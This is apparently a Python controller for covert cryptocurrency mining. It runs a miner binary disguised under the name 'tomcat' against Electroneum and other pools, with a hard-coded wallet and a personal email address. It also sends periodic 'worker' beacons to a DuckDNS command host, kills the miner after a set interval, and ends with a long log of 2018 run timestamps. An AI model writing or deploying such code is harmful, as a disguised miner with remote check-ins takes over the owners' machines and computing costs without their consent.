import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:06.805738
#2018-02-17 17:35:07.285498
#2018-02-17 19:23:06.466997
#2018-02-17 21:14:03.748089
#2018-02-17 22:57:05.538308
#2018-02-18 00:42:07.315779
#2018-02-18 02:31:01.700051
#2018-02-18 04:18:04.116644
#2018-02-18 06:09:02.109775
#2018-02-18 07:57:07.698000
#2018-02-18 09:45:06.394777
#2018-02-18 11:33:05.394055
#2018-02-18 13:18:05.720725
#2018-02-18 15:08:01.524830
#2018-02-18 16:56:05.098089
#2018-02-18 18:45:01.647619
#2018-02-18 20:31:04.195735
#2018-02-18 22:17:04.059560
#2018-02-19 00:06:05.401748
#2018-02-19 01:52:07.717452
#2018-02-19 03:40:08.163105
#2018-02-19 05:25:04.433862
#2018-02-19 07:12:06.731953
#2018-02-19 09:01:07.807168
#2018-02-19 10:49:01.248421
#2018-02-19 12:37:04.401402
#2018-02-19 14:24:01.438901
#2018-02-19 16:12:04.516362
#2018-02-19 18:00:11.159660
#2018-02-19 19:47:04.425115
#2018-02-19 21:36:04.446031
#2018-02-19 23:22:07.637651
#2018-02-20 01:08:05.957513
#2018-02-20 02:56:05.370484
#2018-02-20 04:44:04.464175
#2018-02-20 06:27:07.207956
#2018-02-20 08:12:03.769795
#2018-02-20 09:58:03.750512
#2018-02-20 11:42:07.415585
#2018-02-20 13:29:05.895773
#2018-02-20 15:13:01.297048
#2018-02-20 16:57:09.029551
#2018-02-20 18:46:06.497853
#2018-02-20 20:38:07.625246
#2018-02-20 22:24:06.639630
#2018-02-21 00:06:05.993012
#2018-02-21 01:50:08.375676
#2018-02-21 03:37:06.251390
#2018-02-21 05:26:01.280575
#2018-02-21 07:13:05.472253
#2018-02-21 08:59:08.469221
#2018-02-21 10:47:06.956871
#2018-02-21 12:34:09.003657
#2018-02-21 14:21:01.432566
#2018-02-21 16:09:06.550300
#2018-02-21 18:00:10.484850
#2018-02-21 19:46:09.456251
#2018-02-21 21:34:06.005766
#2018-02-21 23:19:04.882734
#2018-02-22 01:09:06.123008
#2018-02-22 02:57:07.144116
#2018-02-22 04:44:06.729451
#2018-02-22 06:28:08.764049
#2018-02-22 08:16:01.389018
#2018-02-22 10:04:04.655216
#2018-02-22 11:48:15.352322
#2018-02-22 13:33:09.106379
#2018-02-22 15:23:06.140667
#2018-02-22 17:09:08.281372
#2018-02-22 18:54:05.717603
#2018-02-22 20:47:05.594012
#2018-02-22 22:34:04.827240
#2018-02-23 00:18:08.328027
#2018-02-23 02:07:07.425517
#2018-02-23 03:55:04.892257
#2018-02-23 05:37:05.191121
#2018-02-23 07:22:04.266156
#2018-02-23 09:26:05.734553
#2018-02-23 11:31:01.747499
#2018-02-23 13:22:08.515366
#2018-02-23 15:07:06.169246
#2018-02-23 16:57:07.951783
#2018-02-23 18:57:01.919210
#2018-02-23 20:45:03.293263
#2018-02-23 22:33:02.087232
#2018-02-24 00:18:01.303231
#2018-02-24 02:08:08.133016
#2018-02-24 03:58:07.658334
#2018-02-24 05:46:04.022188
#2018-02-24 07:38:01.667703
#2018-02-24 09:23:01.964235
#2018-02-24 11:17:02.116174
#2018-02-24 13:06:06.465789
#2018-02-24 14:57:07.115837
#2018-02-24 16:48:07.975594
#2018-02-24 18:36:06.768920
#2018-02-24 20:25:07.015135
#2018-02-24 22:21:05.976116
#2018-02-25 01:28:07.300838
#2018-02-25 05:26:04.288311
#2018-02-25 11:35:08.113473